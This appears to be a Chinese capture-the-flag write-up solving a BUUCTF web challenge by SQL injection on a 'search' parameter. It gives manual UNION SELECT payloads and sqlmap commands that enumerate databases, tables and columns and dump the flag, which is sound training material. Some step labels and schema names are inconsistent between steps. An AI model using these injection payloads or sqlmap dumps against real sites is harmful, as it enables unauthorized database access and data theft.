打开题目页面如下
看了旁边的链接,也没有什么注入点,是正常的科普
利用burp suite抓包,发现传参
访问一下
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise
接下来进行sql注入
方法一:手工注入
判断字段
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise order by 2
这里url会编码故我们可以使用postman软件来进行测试
字段为2是正常回显,3是页面错误判断字段数为2
判断回显点
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise union select 1,2
爆出数据库名
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise union select version(),database()
爆出表名
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise union select 1,group_concat(column_name) from information_schema.columns where table_name='alien_code'
爆出字段
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise union select group_concat(name),group_concat(description) from code.alien_code
爆出字段内容
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise union select group_concat(id),group_concat(code) from alien_code.code
最后得到flag
方法二:sqlmap注入
爆数据库名
python sqlmap.py -u http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise --dbs
爆表名
python sqlmap.py -u http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise --tables
爆字段名
python sqlmap.py -u http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise -T alien_code --columns
爆字段内容
python sqlmap.py -u http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise -T alien_code -C id --dump
